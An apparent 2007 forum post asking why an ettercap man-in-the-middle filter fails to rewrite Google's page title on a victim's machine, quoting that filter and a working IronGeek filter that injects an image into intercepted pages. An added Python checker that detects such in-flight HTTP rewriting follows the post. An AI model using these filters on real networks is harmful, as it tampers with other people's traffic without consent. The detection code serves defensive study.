I'm trying to write an easy ettercap filter but it doesn't seem to work. The filter is:
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("<title>Google</title>", "<title>Google H4CK3D</title>");
    msg("Filter Ran.\n");
}
The MitM attack works for sure. I can see the traffic going through my laptop.
If I load the Google page on the victim's computer, the page source still has <title>Google</title>.
In Wireshark I can see one request from the Victim with:
Accept-Encoding: gzip,deflate\r\n
and then a second one:
Accept-Rubbish!: gzip,deflate\r\n
but the second request is marked as "TCP out of order". I don't really know what that means.
Then I can see an answer from Google containing the "H4CK3D" title. It's again marked as "TCP out of order".
Anyway, the victim's Google page does not contain the modified code.
Ettercap logs "Filter ran".
If I use this filter, from the IronGeek tutorial, it works fine:
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    msg("Filter Ran.\n");
}
This filter is more or less the same, so I don't understand why mine doesn't work.
Thanks for your advice.
Kind regards,
Tex
Last edited by Tex-Twil (23-08-2007 07:17:22)
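As an added example, not part of the post above and not ettercap code, here is a small offline checker written from the defender's side of the same traffic. It looks at reassembled HTTP messages for two signs of the kind of in-flight rewriting the post describes: a request whose Accept-Encoding header has been overwritten in place with a junk name of the same length (the post's captured "Accept-Rubbish!: gzip,deflate"), and a response whose Content-Length header no longer agrees with the number of body bytes actually present, which is what a longer in-place body replacement leaves behind when the headers are not adjusted. The header-name list and the sample messages are constructed for the example, modelled on the lines quoted in the post; whether Content-Length was the reason the author's page did not render is not something the post establishes.

```python
"""Offline checker for two signs of in-flight HTTP rewriting (added example).

Works on whole HTTP/1.x messages (headers + body), e.g. as reassembled from a
capture, not on individual TCP segments. Sample messages at the bottom are
constructed, modelled on the headers quoted in the forum post.
"""
import re

# Values that look like an Accept-Encoding list (assumed set of tokens).
ENCODING_VALUE = re.compile(
    r"^\s*(gzip|deflate|br|identity|\*)(\s*,\s*(gzip|deflate|br|identity|\*))*\s*$"
)
# Headers that legitimately carry an encoding list (assumption for the example).
KNOWN_ENCODING_HEADERS = {"accept-encoding", "content-encoding", "transfer-encoding", "te"}


def split_message(raw: bytes):
    """Split a raw HTTP/1.x message into (start line, {header: value}, body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP message: no header/body separator")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()   # last duplicate wins; fine for this check
    return lines[0], headers, body


def check_request(raw: bytes) -> list[str]:
    """Flag an encoding list sent under a header name that is not a known one.

    An in-place overwrite of "Accept-Encoding" keeps the value but changes the
    name, so the value is the stable part to key on.
    """
    findings = []
    _, headers, _ = split_message(raw)
    for name, value in headers.items():
        if name.lower() not in KNOWN_ENCODING_HEADERS and ENCODING_VALUE.match(value):
            findings.append(
                f"encoding list sent under non-standard header {name!r}: "
                f"Accept-Encoding likely overwritten in flight"
            )
    return findings


def check_response(raw: bytes) -> list[str]:
    """Flag a body whose length disagrees with the declared Content-Length."""
    findings = []
    _, headers, body = split_message(raw)
    declared = headers.get("Content-Length")
    if declared is not None and declared.isdigit() and int(declared) != len(body):
        delta = len(body) - int(declared)
        findings.append(
            f"Content-Length says {declared} bytes but {len(body)} bytes of body "
            f"were seen ({delta:+d}): body altered after headers were written?"
        )
    return findings


# --- Constructed samples, modelled on the post's Wireshark observations -------
CLEAN_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.google.com\r\n"
                 b"Accept-Encoding: gzip,deflate\r\n\r\n")
TAMPERED_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.google.com\r\n"
                    b"Accept-Rubbish!: gzip,deflate\r\n\r\n")
ORIGINAL_BODY = b"<html><head><title>Google</title></head><body></body></html>"
CLEAN_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                  + b"Content-Length: %d\r\n\r\n" % len(ORIGINAL_BODY)
                  + ORIGINAL_BODY)
# The same response after an in-place title rewrite; the header still states
# the old length, so the body is now 7 bytes longer than declared.
TAMPERED_RESPONSE = CLEAN_RESPONSE.replace(
    b"<title>Google</title>", b"<title>Google H4CK3D</title>"
)

if __name__ == "__main__":
    for label, msg, fn in [
        ("clean request", CLEAN_REQUEST, check_request),
        ("tampered request", TAMPERED_REQUEST, check_request),
        ("clean response", CLEAN_RESPONSE, check_response),
        ("tampered response", TAMPERED_RESPONSE, check_response),
    ]:
        print(f"{label}: {fn(msg) or 'no findings'}")
```

Wireshark's "TCP out of order" is a sequence-number analysis flag on individual segments; this checker deliberately works one layer up, on the reassembled messages, so the two signals complement each other rather than overlap. Run as a script it prints one line per sample; the two tampered samples each produce a finding and the clean ones none.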